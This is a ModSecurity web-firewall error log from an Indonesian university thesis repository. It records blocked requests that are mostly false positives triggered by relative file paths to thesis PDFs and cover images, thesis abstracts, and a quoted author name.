[Mon Aug 28 09:40:42.416925 2023] [:error] [pid 39580] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB III Skripsi Rangga Rahmat Alqodri 41152020170073.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwJKsCo-f0AAJqckTUAAAAR"]
[Mon Aug 28 09:40:46.492796 2023] [:error] [pid 39580] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Cindy_Rizqia_Nur_Utami.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwJLsCo-f0AAJqckTgAAAAR"]
[Mon Aug 28 10:04:47.898221 2023] [:error] [pid 39997] [client 47.128.29.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Robi_Permana.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwOz8Co-f0AAJw9Y0gAAAAP"]
[Mon Aug 28 10:07:23.344197 2023] [:error] [pid 40041] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  : ( found within ARGS:notes: Penelitian ini bertujuan untuk mengetahui pengaruh yang dihasilkan oleh\\x0d\\x0ateknologi informasi dan sistem informasi akuntansi terhadap proses bisnis pada PT.\\x0d\\x0aIndomarco Pristama Bandung. Hasil dari penelitian ini diharapkan mampu menjadi\\x0d\\x0asolusi atas malasah-masalah yang terjadi pada proses bisnis. Informasi data yang di\\x0d\\x0aperoleh melalui survei dengan membagikan angket/kuesioner pada PT. Indomarco\\x0d\\x0aPristama Bandung. Pengolahan data s..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwPa8Co-f0AAJxp@igAAAAT"]
[Mon Aug 28 10:07:31.867705 2023] [:error] [pid 40001] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  : ( found within ARGS:notes: Penelitian ini bertujuan untuk mengetahui pengaruh yang dihasilkan oleh\\x0d\\x0ateknologi informasi dan sistem informasi akuntansi terhadap proses bisnis pada PT.\\x0d\\x0aIndomarco Pristama Bandung. Hasil dari penelitian ini diharapkan mampu menjadi\\x0d\\x0asolusi atas malasah-masalah yang terjadi pada proses bisnis. Informasi data yang di\\x0d\\x0aperoleh melalui survei dengan membagikan angket/kuesioner pada PT. Indomarco\\x0d\\x0aPristama Bandung. Pengolahan data s..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwPc8Co-f0AAJxBCG0AAAAK"]
[Mon Aug 28 10:08:39.356098 2023] [:error] [pid 40063] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  : ( found within ARGS:notes: Penelitian ini bertujuan untuk mengetahui pengaruh yang dihasilkan oleh\\x0d\\x0ateknologi informasi dan sistem informasi akuntansi terhadap proses bisnis pada PT.\\x0d\\x0aIndomarco Pristama Bandung. Hasil dari penelitian ini diharapkan mampu menjadi\\x0d\\x0asolusi atas malasah-masalah yang terjadi pada proses bisnis. Informasi data yang di\\x0d\\x0aperoleh melalui survei dengan membagikan angket/kuesioner pada PT. Indomarco\\x0d\\x0aPristama Bandung. Pengolahan data s..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwPt8Co-f0AAJx-fBcAAAAZ"]
[Mon Aug 28 10:10:09.414250 2023] [:error] [pid 40046] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Fadiila_Hasyanah_41152020190024-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwQEcCo-f0AAJxu@8wAAAAA"]
[Mon Aug 28 10:10:43.435147 2023] [:error] [pid 40050] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  : ( found within ARGS:notes: Penelitian ini bertujuan untuk mengetahui pengaruh yang dihasilkan oleh\\x0d\\x0ateknologi informasi dan sistem informasi akuntansi terhadap proses bisnis pada PT.\\x0d\\x0aIndomarco Pristama Bandung. Hasil dari penelitian ini diharapkan mampu menjadi\\x0d\\x0asolusi atas malasah-masalah yang terjadi pada proses bisnis. Informasi data yang di\\x0d\\x0aperoleh melalui survei dengan membagikan angket/kuesioner pada PT. Indomarco\\x0d\\x0aPristama Bandung. Pengolahan data s..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwQM8Co-f0AAJxyjKQAAAAB"]
[Mon Aug 28 10:10:43.777489 2023] [:error] [pid 40169] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_SEKAR_ARUM_R_41152010190188-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwQM8Co-f0AAJzpm@YAAAAc"]
[Mon Aug 28 10:10:57.203341 2023] [:error] [pid 40167] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER,DAFTAR LAMPIRAN_SEKAR ARUM R_41152010190188-1-23.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwQQcCo-f0AAJznDJoAAAAa"]
[Mon Aug 28 10:11:06.662534 2023] [:error] [pid 40039] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB I PENDAHULUAN_SEKAR ARUM R_41152010190188.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwQSsCo-f0AAJxnEVEAAAAQ"]
[Mon Aug 28 10:11:19.241563 2023] [:error] [pid 40042] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_SEKAR_ARUM_R_41152010190188-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwQV8Co-f0AAJxqMPAAAAAU"]
[Mon Aug 28 10:11:21.053148 2023] [:error] [pid 40159] [client 47.128.17.173] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Tri Wisda\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwQWcCo-f0AAJzfREAAAAAK"]
[Mon Aug 28 10:11:22.222758 2023] [:error] [pid 40158] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER,DAFTAR LAMPIRAN_SEKAR ARUM R_41152010190188-1-23.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwQWsCo-f0AAJzevaEAAAAI"]
[Mon Aug 28 10:11:24.889217 2023] [:error] [pid 40158] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//LAMPIRAN_SEKAR ARUM R_41152010190188.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwQXMCo-f0AAJzevaMAAAAI"]
[Mon Aug 28 10:11:37.812111 2023] [:error] [pid 40221] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_IIS_Iis_Fitriana-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwQacCo-f0AAJ0dbfoAAAAH"]
[Mon Aug 28 10:11:41.935570 2023] [:error] [pid 40167] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB I IIS Iis Fitriana.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwQbcCo-f0AAJznDKEAAAAa"]
[Mon Aug 28 10:14:47.076627 2023] [:error] [pid 40243] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  : ( found within ARGS:notes: Penelitian ini bertujuan untuk mengetahui pengaruh yang dihasilkan oleh\\x0d\\x0ateknologi informasi dan sistem informasi akuntansi terhadap proses bisnis pada PT.\\x0d\\x0aIndomarco Pristama Bandung. Hasil dari penelitian ini diharapkan mampu menjadi\\x0d\\x0asolusi atas malasah-masalah yang terjadi pada proses bisnis. Informasi data yang di\\x0d\\x0aperoleh melalui survei dengan membagikan angket/kuesioner pada PT. Indomarco\\x0d\\x0aPristama Bandung. Pengolahan data s..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwRJ8Co-f0AAJ0zK-sAAAAC"]
[Mon Aug 28 10:16:15.597124 2023] [:error] [pid 40255] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/1._cover_Nisa_Yulia_Rahma-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwRf8Co-f0AAJ0-izgAAAAJ"]
[Mon Aug 28 10:16:24.714207 2023] [:error] [pid 40066] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Eldisa_Utami_Putri-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwRiMCo-f0AAJyCs5kAAAAO"]
[Mon Aug 28 10:16:36.068522 2023] [:error] [pid 40253] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Hamzah_Nururohman-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwRlMCo-f0AAJ09tbgAAAAR"]
[Mon Aug 28 10:16:42.949134 2023] [:error] [pid 40257] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Cover-Daftar Lampiran Hamzah Nururohman.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwRmsCo-f0AAJ1B2BYAAAAN"]
[Mon Aug 28 10:16:53.926581 2023] [:error] [pid 40248] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Bab 3 Hamzah Nururohman.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwRpcCo-f0AAJ0482kAAAAG"]
[Mon Aug 28 10:34:43.720452 2023] [:error] [pid 40580] [client 47.128.30.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Dita_Amelia_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwV08Co-f0AAJ6E4OEAAAAJ"]
[Mon Aug 28 10:35:45.883637 2023] [:error] [pid 40558] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Fadiila_Hasyanah_41152020190024-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwWEcCo-f0AAJ5ujpIAAAAI"]
[Mon Aug 28 10:36:48.245208 2023] [:error] [pid 40586] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER-DAFTAR LAMPIRAN_Fadiila Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwWUMCo-f0AAJ6KGuAAAAAK"]
[Mon Aug 28 10:37:28.495790 2023] [:error] [pid 40585] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB IV_Fadilla Hasyanah_41152020190024.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwWeMCo-f0AAJ6J5YkAAAAB"]
[Mon Aug 28 11:06:30.671781 2023] [:error] [pid 40966] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_IIS_Iis_Fitriana-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwdRsCo-f0AAKAGgVYAAAAb"]
[Mon Aug 28 11:06:31.562816 2023] [:error] [pid 40966] [client 36.72.44.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_IIS_Iis_Fitriana-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwdR8Co-f0AAKAGgV4AAAAb"]
[Mon Aug 28 11:10:53.536084 2023] [:error] [pid 40879] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Yuyun_Hasibuan_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOweTcCo-f0AAJ@vff4AAAAK"]
[Mon Aug 28 11:10:57.363754 2023] [:error] [pid 41146] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/01.COVER_-_Gery_Renaldi_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOweUcCo-f0AAKC62cIAAAAN"]
[Mon Aug 28 11:10:59.859678 2023] [:error] [pid 41145] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Luthfiyyah_Azzahra_Ramadhani_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOweU8Co-f0AAKC5NVgAAAAJ"]
[Mon Aug 28 11:11:03.612926 2023] [:error] [pid 41145] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Berliana_Susanti.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOweV8Co-f0AAKC5NVwAAAAJ"]
[Mon Aug 28 11:11:06.265555 2023] [:error] [pid 41148] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Indah_Siti_Saadah_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOweWsCo-f0AAKC8WE8AAAAX"]
[Mon Aug 28 11:11:11.767176 2023] [:error] [pid 41149] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_RISKI_ADRIANI.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOweX8Co-f0AAKC9nPcAAAAY"]
[Mon Aug 28 11:11:14.008267 2023] [:error] [pid 41149] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Vera.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOweYsCo-f0AAKC9nPoAAAAY"]
[Mon Aug 28 11:11:18.144332 2023] [:error] [pid 41149] [client 36.79.188.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER-ANTIKHA.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOweZsCo-f0AAKC9nP0AAAAY"]
